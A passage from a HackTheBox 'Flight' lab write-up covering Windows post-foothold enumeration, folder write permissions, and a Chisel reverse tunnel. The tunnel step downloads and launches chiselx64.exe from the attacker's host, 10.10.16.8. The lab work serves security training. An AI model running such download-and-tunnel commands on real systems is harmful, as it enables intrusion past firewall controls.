Web
2 undisclosed ports on the target system have been identified upon gaining the initial foothold; 443 and 8000
While this was [[Flight_Automated#|confirmed]] by PEAS at a later stage, I found something interesting.
The port 443
- was initiated
- is being used by the Apache’s httpd.exe
The port
8000 - was initiated
- is being used by SYSTEM
443
PS C:\> cat C:\xampp\apache\conf\extra\httpd-ssl.conf | Where-Object { $_ -notmatch '^#' } | ForEach-Object { $_.TrimEnd() }
Listen 443
SSLCipherSuite HIGH:MEDIUM:!MD5:!RC4:!3DES
SSLProxyCipherSuite HIGH:MEDIUM:!MD5:!RC4:!3DES
SSLHonorCipherOrder on
SSLProtocol all -SSLv3
SSLProxyProtocol all -SSLv3
SSLPassPhraseDialog builtin
SSLSessionCache "shmcb:/xampp/apache/logs/ssl_scache(512000)"
SSLSessionCacheTimeout 300
<VirtualHost _default_:443>
DocumentRoot "/xampp/htdocs"
ServerName www.example.com:443
ServerAdmin admin@example.com
ErrorLog "/xampp/apache/logs/error.log"
TransferLog "/xampp/apache/logs/access.log"
SSLEngine on
SSLCertificateFile "conf/ssl.crt/server.crt"
SSLCertificateKeyFile "conf/ssl.key/server.key"
<FilesMatch "\.(cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory "/xampp/apache/cgi-bin">
SSLOptions +StdEnvVars
</Directory>
BrowserMatch "MSIE [2-5]" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
CustomLog "/xampp/apache/logs/ssl_request.log" \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
</VirtualHost>Checking the SSL configuration of the Apache XAMPP seems to suggest that the web applications were planned for being hosted over HTTPS although not available at the moment due to the firewall restriction
8000
ps c:\> ls
directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/11/2023 7:47 PM inetpub
d----- 6/7/2022 6:39 AM PerfLogs
d-r--- 10/21/2022 11:49 AM Program Files
d----- 7/20/2021 12:23 PM Program Files (x86)
d----- 12/11/2023 5:05 PM Shared
d----- 9/22/2022 12:28 PM StorageReports
d----- 12/11/2023 7:11 PM tmp
d-r--- 9/22/2022 1:16 PM Users
d----- 10/21/2022 11:52 AM Windows
d----- 9/22/2022 1:16 PM xampp aside from those 2 web apps hosted from the apache xampp, there is also the default c:\inetpub directory
ps c:\> cd inetpub ; ls
directory: C:\inetpub
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:24 PM custerr
d----- 12/11/2023 8:02 PM development
d----- 9/22/2022 1:08 PM history
d----- 9/22/2022 12:32 PM logs
d----- 9/22/2022 12:24 PM temp
d----- 9/22/2022 12:28 PM wwwroot
ps c:\inetpub> ls wwwroot
directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:28 PM aspnet_client
-a---- 9/22/2022 12:24 PM 703 iisstart.htm
-a---- 9/22/2022 12:24 PM 99710 iisstart.pngOne of the directories suggests that this might another web app in development
development
PS C:\inetpub> ls development
Directory: C:\inetpub\development
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/11/2023 8:07 PM css
d----- 12/11/2023 8:07 PM fonts
d----- 12/11/2023 8:07 PM img
d----- 12/11/2023 8:07 PM js
-a---- 4/16/2018 2:23 PM 9371 contact.html
-a---- 4/16/2018 2:23 PM 45949 index.htmlThis appears to be a whole new web app
Permission
ps c:\inetpub\development> icacls .
flight\c.bum:(OI)(CI)(W)
nt service\trustedinstaller:(I)(F)
nt service\trustedinstaller:(I)(OI)(CI)(IO)(F)
nt authority\system:(I)(F)
nt authority\system:(I)(OI)(CI)(IO)(F)
builtin\administrators:(I)(F)
builtin\administrators:(I)(OI)(CI)(IO)(F)
builtin\users:(I)(RX)
builtin\users:(I)(OI)(CI)(IO)(GR,GE)
creator owner:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 filesPermissions set to the directory reveals an interesting set of information that could be leveraged
Additionally, this is an internal web application due to the presence of firewall. I would need to tunnel it to check it out
Tunneling with Chisel
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ chisel server -p 55555 --reverse -v
2023/12/12 04:19:24 server: Reverse tunnelling enabled
2023/12/12 04:19:24 server: Fingerprint Y+wlAaRrjWARfP426qX2zk2xeiMQbzqENdMB6aYp64s=
2023/12/12 04:19:24 server: Listening on http://0.0.0.0:55555Starting a reverse chisel server on the Kali port 55555
PS C:\tmp> iwr -Uri http://10.10.16.8/chiselx64.exe -Outfile C:\tmp\chiselx64.exe
PS C:\tmp> cmd /c START /B C:\tmp\chiselx64.exe client 10.10.16.8:55555 R:8000:8000
2023/12/11 19:26:20 client: Connecting to ws://10.10.16.8:55555
2023/12/11 19:26:22 client: Connected (Latency 98.4606ms)From the target system, I tunneled the Kali port 8000 to the target port 8000
The command was wrapped around the PowerShell Start-Process cmdlet to continue to use the terminal
Tunnel established
GUI
Webroot
It indeed appears to be an updated version of the original web application
The GUI seems more modern
This time, the submission form seems functional as it sends out a GET request with a few parameters although there isn’t any defined response
However, the contact.html file does not seem to work as there isn’t any handler for such operation
The web app alone isn’t exploitable